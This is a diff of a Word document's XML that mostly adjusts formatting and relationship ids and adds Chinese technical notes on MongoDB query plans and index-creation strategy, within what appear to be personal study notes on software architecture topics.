-        <w:ind w:left="450"/>
-        <w:rPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:firstLineChars="50" w:firstLine="140"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="0070C0"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -13374,14 +13375,15 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="37"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="91"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -14137,6 +14139,7 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
+        <w:outlineLvl w:val="2"/>
         <w:rPr>
           <w:b/>
           <w:bCs/>
@@ -16212,6 +16215,7 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
+        <w:outlineLvl w:val="2"/>
         <w:rPr>
           <w:b/>
           <w:bCs/>
@@ -16728,6 +16732,7 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
+        <w:outlineLvl w:val="2"/>
         <w:rPr>
           <w:b/>
           <w:sz w:val="24"/>
@@ -17183,6 +17188,7 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
+        <w:outlineLvl w:val="2"/>
         <w:rPr>
           <w:b/>
           <w:bCs/>
@@ -17381,9 +17387,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17413,9 +17416,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17433,9 +17433,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17447,9 +17444,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17462,9 +17456,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17477,9 +17468,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17518,9 +17506,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17551,9 +17536,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17584,9 +17566,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17618,9 +17597,6 @@
       <w:pPr>
         <w:widowControl/>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17632,9 +17608,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17646,17 +17619,11 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17674,9 +17641,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17688,17 +17652,11 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17728,9 +17686,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17742,9 +17697,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17757,9 +17709,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17772,9 +17721,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17793,9 +17739,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17815,9 +17758,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17839,9 +17779,6 @@
       <w:pPr>
         <w:widowControl/>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17853,9 +17790,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17867,9 +17801,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17881,9 +17812,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>E</w:t>
@@ -17955,9 +17883,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>A</w:t>
@@ -17990,17 +17915,11 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18018,9 +17937,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18032,9 +17948,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18047,9 +17960,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18063,9 +17973,6 @@
       <w:pPr>
         <w:widowControl/>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18079,9 +17986,6 @@
       <w:pPr>
         <w:widowControl/>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18095,9 +17999,6 @@
       <w:pPr>
         <w:widowControl/>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18109,6 +18010,9 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18116,6 +18020,416 @@
         </w:rPr>
         <w:t>}</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>查询计划</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>(Query Plan)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>我们可以使用</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>db.Collection.explain()</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>来查看</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>查询计划，它可以为我们制定优化方案提供支持。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>每次我们查询时都会生成一个查询计划，下次再查询时，系统会优先考虑之前缓存下来的查询计划。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>具体步骤如图所示。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="3013710" cy="5732780"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="9" name="图片 4"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 4"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16" cstate="print"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3013710" cy="5732780"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>要注意的是查询计划会在重启或关闭时清空。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>索引创建策略</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ac"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="172"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>如果查询只查询单个键，只需建立单键索引即可</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ac"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="172"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>如果查询要支持多种条件，则需要建立复合索引</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>比如：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+      </w:pPr>
+      <w:r>
+        <w:t>{ "category": 1, "item": 1 }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>可以用：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> category</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>做前缀</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>也可以用：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>category + item</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>千万不要：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> item + category </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>这种模式。。。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ac"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="172"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>Sort</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>时最好</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>Sort</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>的键也在索引上</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ac"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="172"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>索引最好能存储在内存中</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ac"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="172"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>确保索引的高选择性</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>（可用复合索引代替单键索引和复合索引）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18140,6 +18454,7 @@
           <w:szCs w:val="31"/>
           <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>面向服务架构SOA</w:t>
       </w:r>
     </w:p>
@@ -18940,7 +19255,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>是</w:t>
       </w:r>
       <w:r>
@@ -19397,6 +19711,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>开放封闭原则</w:t>
       </w:r>
       <w:r>
@@ -20184,7 +20499,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="114300" distR="114300">
             <wp:extent cx="5270500" cy="2172335"/>
@@ -20203,7 +20517,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16" cstate="print"/>
+                    <a:blip r:embed="rId17" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -20398,6 +20712,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Expires</w:t>
       </w:r>
       <w:r>
@@ -21203,7 +21518,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>所以缓存</w:t>
       </w:r>
       <w:r>
@@ -21521,6 +21835,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="114300" distR="114300">
             <wp:extent cx="5269230" cy="3714750"/>
@@ -21539,7 +21854,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17" cstate="print"/>
+                    <a:blip r:embed="rId18" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -21591,7 +21906,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId18" w:anchor="undefined" w:history="1">
+      <w:hyperlink r:id="rId19" w:anchor="undefined" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -21610,7 +21925,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId19" w:history="1">
+      <w:hyperlink r:id="rId20" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -21629,7 +21944,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId20" w:history="1">
+      <w:hyperlink r:id="rId21" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -22144,7 +22459,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>3</w:t>
       </w:r>
       <w:r>
@@ -22429,7 +22743,7 @@
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId21" w:history="1">
+      <w:hyperlink r:id="rId22" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a5"/>
@@ -22454,7 +22768,7 @@
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId22" w:history="1">
+      <w:hyperlink r:id="rId23" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -22887,7 +23201,7 @@
           <w:szCs w:val="44"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId23" w:history="1">
+      <w:hyperlink r:id="rId24" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a5"/>
@@ -23190,7 +23504,6 @@
           <w:szCs w:val="22"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>参考网址：</w:t>
       </w:r>
     </w:p>
@@ -23209,7 +23522,7 @@
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId24" w:history="1">
+      <w:hyperlink r:id="rId25" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -23298,6 +23611,7 @@
           <w:noProof/>
           <w:sz w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="114300" distR="114300">
             <wp:extent cx="5095240" cy="2761615"/>
@@ -23316,7 +23630,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId25" cstate="print"/>
+                    <a:blip r:embed="rId26" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -23435,7 +23749,7 @@
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId26" w:history="1">
+      <w:hyperlink r:id="rId27" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -23460,7 +23774,7 @@
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId27" w:history="1">
+      <w:hyperlink r:id="rId28" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -23689,6 +24003,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>既然是缓存，就注定了它的资源是有限的，宝贵的，也就注定了我们必须合理利用它的内存空间，也就被迫的让我们清楚的认识到热点数据，不易修改的应该放在缓存，反之不宜放。</w:t>
       </w:r>
     </w:p>
@@ -24705,7 +25020,6 @@
           <w:szCs w:val="31"/>
           <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>平台</w:t>
       </w:r>
     </w:p>
@@ -24776,6 +25090,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>CoreCLR</w:t>
       </w:r>
     </w:p>
@@ -25900,7 +26215,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Microsoft.Owin.Host.HttpListener</w:t>
       </w:r>
     </w:p>
@@ -26021,6 +26335,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Host(</w:t>
       </w:r>
       <w:r>
@@ -27003,7 +27318,6 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="114300" distR="114300">
             <wp:extent cx="4571365" cy="3218815"/>
@@ -27022,7 +27336,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId28" cstate="print"/>
+                    <a:blip r:embed="rId29" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -27071,6 +27385,7 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="114300" distR="114300">
             <wp:extent cx="5085715" cy="3704590"/>
@@ -27089,7 +27404,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId29" cstate="print"/>
+                    <a:blip r:embed="rId30" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -27277,7 +27592,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
